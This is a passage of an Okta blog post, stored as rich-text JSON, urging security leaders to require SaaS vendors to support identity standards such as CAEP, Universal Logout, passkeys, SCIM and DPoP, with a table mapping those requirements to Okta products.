Continuous Access Evaluation Profile (CAEP)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta recently reduced the default maximum duration and idle duration for administrative sessions in Okta in an effort to shift the industry towards “secure by default” principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Counterintuitively, the default session for most SaaS applications is getting longer.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From a security perspective, organizations can only afford to extend the life of application sessions if security teams are confident that they can detect changes in user risk mid-session, and in near real time, orchestrating immediate responses to those signals in ways that don’t create excessive friction for legitimate users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/02/unifying-efforts-amplifying-security-shared-signals-interoperability/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Continuous Access Evaluation Profile (CAEP)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" offers a path forward. CAEP provides a standardized way of ensuring that a change in session risk identified by one SaaS application can autonomously create responses in every other SaaS application accessed by the user via their Identity Provider.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, there are numerous risk signals Identity Providers like Okta can observe in relation to changes in user and session risk. 
But these signals aren’t always observable by the downstream SaaS applications accessed during an Okta session. SaaS applications can also observe changes in user and session risk, many of which, in turn, aren’t observable to the Identity Provider.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Continuous Access Evaluation Profile (CAEP), which uses the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://openid.net/wg/sharedsignals/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Shared Signals Framework\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" standardized by the OpenID Foundation, is a publish/subscribe mechanism for describing changes in user, device, or session risk. Okta has built the necessary components to be a transmitter, receiver and aggregator of risk signals between applications, and is building an ecosystem of SaaS applications and security providers to exchange signals with.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Risk signals are already published and acted on by customers using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2023/10/identity-threat-protection-with-okta-ai-is-transforming-security/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Threat Protection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in limited early access. Now is the time for CSOs to demand SaaS applications support the same risk sharing standards. 
Consider the following requirement in your vendor security questionnaire:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must be able to transmit and subscribe to risk signals using open, industry standard frameworks.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With all the signals being exchanged using CAEP, security teams also need the ability to automate responses to heightened session risk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One possible response would be for the SaaS application to trigger re-authentication when responding to a change in session risk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the observed risk meets an appropriately high threshold, the user’s IdP (Identity Provider) session and each of the user’s individual sessions with SaaS applications need to be revoked.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Up until now, there hasn’t been a simple way to do this. Single Logout (SLO) offered a partial solution. A user can log out of a SaaS application that supports SLO and be automatically signed out of their Identity Provider (IdP) session. 
The missing piece was a method of revoking the sessions and tokens of ALL the connected SaaS applications a user authorized during an IdP session, including native apps and SaaS integrations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enter \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/oin-universal-logout-overview/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", a standardized method Okta has proposed to handle the “Single Sign-Out” problem. Universal Logout saves SecOps personnel the hassle of manually identifying and signing out users from each SaaS application accessed during a risky session.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CSOs need to demand that SaaS applications publish a Universal Logout endpoint to facilitate this process. 
Consider the following requirement in your vendor security questionnaire:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must publish a standard interface for revoking access to an application, including OAuth tokens.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do these requirements move the needle?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When more applications meet these requirements:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Users can only authenticate to an enterprise resource with a phishing-resistant authenticator from the right device(s),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications will only accept requests from the right users with the right permissions,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sessions/tokens for web or native apps can only be used from the same device authorized to access them,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Long-lived sessions are continuously re-evaluated for risk using signals from the enterprise and the 
application,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All access from all devices can be terminated in real-time to limit the blast radius of a stolen session.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As the world’s largest independent and app-neutral Identity Provider, Okta is positioned to help organizations and application service providers meet these requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has the unique position of being able to influence the ability of the next generation of SaaS applications to enable these features with the check of a box (in the Customer Identity Cloud), and to provide a market for the next generation of B2B SaaS applications to reach workforce users via the Okta Integration Network. 
Okta has also enabled application integration wizards to help SaaS applications to retrofit these features.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security teams need to demand more from the SaaS ecosystem to solve these fundamental security challenges.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS Apps of the Future - Requirement Statements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A more expansive list of requirements for SaaS applications is provided below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Requirement\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standard\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Requirement Statement\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Support\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Single 
Sign-On\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIDC \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"(\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://openid.net/specs/openid-connect-core-1_0.html#\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OpenID Connect\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must support Single Sign-On using a protocol that can protect privileged operations in the application with phishing-resistant re-authentication provided by the Identity Provider.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modern, best of breed applications using the Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Customer Identity Cloud \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"(Auth0) and the Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Workforce Identity Cloud \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"support OIDC.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both platforms support transactional 
MFA.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Passkeys\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2 WebAuthn\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Break Glass Accounts (non-Federated accounts) in enterprise SaaS applications must be protected by phishing-resistant factors to thwart common credential-based attacks. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Passkeys\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" are supported as the primary authenticator in both the Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Customer Identity Cloud \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"(Auth0) and the Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Workforce Identity Cloud \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Provisioning and 
Deprovisioning\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/html/draft-ietf-scim-core-schema\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SCIM\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (System for Cross-domain Identity Management)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must support industry standard approaches to the automated provisioning and deprovisioning of users.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Lifecycle Management\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" uses SCIM to automate user lifecycle management.  
Applications built on the Okta Customer Identity Cloud (Auth0) can be managed by any SCIM-compatible client, such as the Okta Workforce Identity Cloud.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Role and Entitlement management\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/html/draft-ietf-scim-roles-entitlements-00\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SCIM\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Roles and Entitlements Extension\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must support centralized identity governance mechanisms that ensure users are only provided the minimum permissions required for their role at any given time.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Governance\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" can manage user entitlements within the world’s top SaaS applications. 
\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Logs \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"REST APIs\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must offer programmatic access to logs that can be streamed in real time.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Logs should capture all security-relevant events. Events should be well documented and presented in a structured, industry-standard format. All distinct fields should be able to be programmatically parsed.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Log Streaming \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"offers access to Okta log events in close to real-time for both the Okta Customer Identity Cloud (Auth0) and Workforce Identity Cloud \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dynamic Access Management 
\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://openid.net/wg/sharedsignals/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Continuous Access Evaluation Profile (CAEP)\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must be able to transmit and subscribe to risk signals using open, industry standard frameworks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At minimum, applications need to publish and subscribe to the following events:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session Revoked\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Identity Threat Protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" can publish and subscribe to CAEP-compliant events. 
\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Universal Logout\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/html/draft-parecki-oauth-global-token-revocation-01\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Global Token Revocation\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must publish a standard interface for revoking access to an application, including OAuth tokens.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our roadmap supports Universal Logout across all Okta applications.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Access Standards\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/draft-ietf-oauth-v2-1/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OAuth 
2.1\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications should implement OAuth 2.1 based access to their APIs \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OAuth is the industry standard for secure API access and supports both user delegated and non-human service based access mechanisms.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sender Constrained Tokens\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/dpop/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession (DPoP)\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must require cryptographic proof that a client presenting an access token was the client authorized to do so (demonstrating Proof-of-Possession).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Workforce Identity Cloud supports 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"DPoP\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" and requires it by default for new API Service Integrations.\\n\\nOkta’s roadmap includes plans to embed DPoP for new B2B SaaS apps in the Okta Customer Identity Cloud (Auth0).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Best Practices\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://oauth.net/2/oauth-best-practice/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OAuth2.0 Security BCP\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\\n\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://oauth.net/2/browser-based-apps/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Browser-based Apps BCP\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\\n\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://oauth.net/2/native-apps/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Native and Mobile Apps BCP\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.rfc-editor.org/rfc/rfc7523.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"JWT Client 
Authentication and Authorization Grants\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications should support agreed Best Current Practices agreed by IETF.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta personnel are contributors to many of these Best Current Practice materials.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is helping to incubate several other identity standards that were deliberately omitted from this list, given that they are not yet actionable by security teams. The emerging work in W3C around \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/WICG/dbsc/blob/main/README.md\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device Bound Session Credentials\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is most interesting, as it brings proof-of-possession properties to browser-based session cookies; which is the final piece in the puzzle for protecting modern apps.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T20:54:14.642Z","secAuthor":[{"id":"49d070bc-d763-5c0e-9734-5ec90fcfcd0d","bio":{"bio":"<p>Karl McGuinness is Chief Product Architect at Okta where he is responsible for product strategy, architecture, and identity standards. He has over 20 years of experience in the identity industry building and scaling market leading products and infrastructure. 
